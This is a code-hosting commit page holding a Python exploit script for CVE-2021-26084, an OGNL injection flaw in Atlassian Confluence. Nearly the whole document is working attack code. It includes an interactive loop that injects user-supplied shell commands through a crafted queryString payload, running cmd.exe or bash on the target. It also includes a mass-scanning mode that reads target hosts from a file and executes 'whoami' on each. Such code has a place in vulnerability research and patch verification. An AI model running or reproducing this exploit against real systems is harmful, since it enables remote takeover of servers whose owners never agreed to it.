crash.software
Projects
Pull Requests
Issues
Builds
CVE-2021-26084
Code
Files
Commits
Branches
Tags
Pull Requests
Code Comments
Code Compare
Issues
Builds
Statistics
Child Projects
cra.sh
RESTful API
Projects STRLCPY CVE-2021-26084 Commits 7be72588
🤬
Revision indexing in progress... (symbol navigation in revisions will be accurate after indexed)
  • ■ ■ ■ ■ ■ ■
    CVE-2021-26084_Confluence_OGNLInjection.py
     1 +#!/usr/bin/python3
     2 +import requests
     3 +import optparse
     4 +from bs4 import BeautifulSoup
     5 +import optparse
     6 +from requests.packages import urllib3
     7 +urllib3.disable_warnings()
     8 +
     9 +parser = optparse.OptionParser()
     10 +parser.add_option('-u', '--url', action="store", dest="url", help="Base target host: http://confluencexxx.com")
     11 +parser.add_option('-p', '--path', action="store", dest="path", help="Path to exploitation: /pages/createpage-entervariables.action?SpaceKey=x", default="/pages/createpage-entervariables.action?SpaceKey=x")
     12 +parser.add_option('-r', '--read_file', action="store", dest="file", help="Base target host file")
     13 +
     14 +options, args = parser.parse_args()
     15 +session = requests.Session()
     16 +url_vuln = options.url
     17 +endpoint = options.path
     18 +file = options.file
     19 +
     20 +if not options.url and not file:
     21 +
     22 + print('[+] Specify an url target')
     23 + print('[+] Example usage: exploit.py -u http://xxxxx.com -p /pages/createpage-entervariables.action?SpaceKey=x')
     24 + print('[+] Example usage: exploit.py -r xxx.txt')
     25 + print('[+] Example help usage: exploit.py -h')
     26 + exit()
     27 +
     28 +def cmdExec():
     29 +
     30 + while True:
     31 +
     32 + cmd = input('> ')
     33 +
     34 + xpl_url = url_vuln + endpoint
     35 + xpl_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36",
     36 + "Connection": "close",
     37 + "Content-Type": "application/x-www-form-urlencoded",
     38 + "Accept-Encoding": "gzip, deflate"}
     39 + xpl_data = {"queryString": "aaaaassssssssssaaa\\u0027+{Class.forName(\\u0027javax.script.ScriptEngineManager\\u0027).newInstance().getEngineByName(\\u0027JavaScript\\u0027).\\u0065val(\\u0027var isWin = java.lang.System.getProperty(\\u0022os.name\\u0022).toLowerCase().contains(\\u0022win\\u0022); var cmd = new java.lang.String(\\u0022"+cmd+"\\u0022);var p = new java.lang.ProcessBuilder(); if(isWin){p.command(\\u0022cmd.exe\\u0022, \\u0022/c\\u0022, cmd); } else{p.command(\\u0022bash\\u0022, \\u0022-c\\u0022, cmd); }p.redirectErrorStream(true); var process= p.start(); var inputStreamReader = new java.io.InputStreamReader(process.getInputStream()); var bufferedReader = new java.io.BufferedReader(inputStreamReader); var line = \\u0022\\u0022; var output = \\u0022\\u0022; while((line = bufferedReader.readLine()) != null){output = output + line + java.lang.Character.toString(10); }\\u0027)}+\\u0027"}
     40 + rawHTML = session.post(xpl_url, headers=xpl_headers, data=xpl_data, verify=False)
     41 +
     42 + soup = BeautifulSoup(rawHTML.text, 'html.parser')
     43 + queryStringValue = soup.find('input',attrs = {'name':'queryString', 'type':'hidden'})['value']
     44 + print(queryStringValue)
     45 +
     46 +def co_poc():
     47 + cmd = 'whoami'
     48 + for line in open(file):
     49 + url_vuln=line.strip()
     50 + if '://' not in url_vuln:
     51 + url_vuln = 'http://' + url_vuln
     52 + if not url_vuln.endswith('/'):
     53 + url_vuln = url_vuln + "/"
     54 + xpl_url = url_vuln +'pages/doenterpagevariables.action'
     55 + xpl_url2 = url_vuln + 'pages/createpage-entervariables.action'
     56 + xpl_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36",
     57 + "Connection": "close",
     58 + "Content-Type": "application/x-www-form-urlencoded",
     59 + "Accept-Encoding": "gzip, deflate"}
     60 + xpl_data = {"queryString": "aaaaaaaa\\u0027+{Class.forName(\\u0027javax.script.ScriptEngineManager\\u0027).newInstance().getEngineByName(\\u0027JavaScript\\u0027).\\u0065val(\\u0027var isWin = java.lang.System.getProperty(\\u0022os.name\\u0022).toLowerCase().contains(\\u0022win\\u0022); var cmd = new java.lang.String(\\u0022"+cmd+"\\u0022);var p = new java.lang.ProcessBuilder(); if(isWin){p.command(\\u0022cmd.exe\\u0022, \\u0022/c\\u0022, cmd); } else{p.command(\\u0022bash\\u0022, \\u0022-c\\u0022, cmd); }p.redirectErrorStream(true); var process= p.start(); var inputStreamReader = new java.io.InputStreamReader(process.getInputStream()); var bufferedReader = new java.io.BufferedReader(inputStreamReader); var line = \\u0022\\u0022; var output = \\u0022\\u0022; while((line = bufferedReader.readLine()) != null){output = output + line + java.lang.Character.toString(10); }\\u0027)}+\\u0027"}
     61 + rawHTML = session.post(xpl_url, headers=xpl_headers, data=xpl_data, verify=False)
     62 + rawHTML2 = session.post(xpl_url2, headers=xpl_headers, data=xpl_data, verify=False)
     63 + soup = BeautifulSoup(rawHTML.text, 'html.parser')
     64 + soup2 = BeautifulSoup(rawHTML2.text, 'html.parser')
     65 + try:
     66 + queryStringValue = soup.find('input',attrs = {'name':'queryString', 'type':'hidden'})['value']
     67 + if 'aaaaaaaa[' in queryStringValue:
     68 + print('[+] This url is Vulnerable '+xpl_url)
     69 + queryStringValue = soup2.find('input',attrs = {'name':'queryString', 'type':'hidden'})['value']
     70 + if 'aaaaaaaa[' in queryStringValue:
     71 + print('[+] This url is Vulnerable '+xpl_url2)
     72 + if 'aaaaaaaa[' not in queryStringValue:
     73 + print('[-] This url is not Vulnerable '+xpl_url)
     74 + except:
     75 + print('[-] This url is not Vulnerable '+xpl_url)
     76 +
     77 +if __name__ == "__main__":
     78 + if options.url:
     79 + cmdExec()
     80 + if file:
     81 + co_poc()
     82 +
     83 +
     84 +
     85 +
     86 + 
Please wait...
Page is in error, reload to recover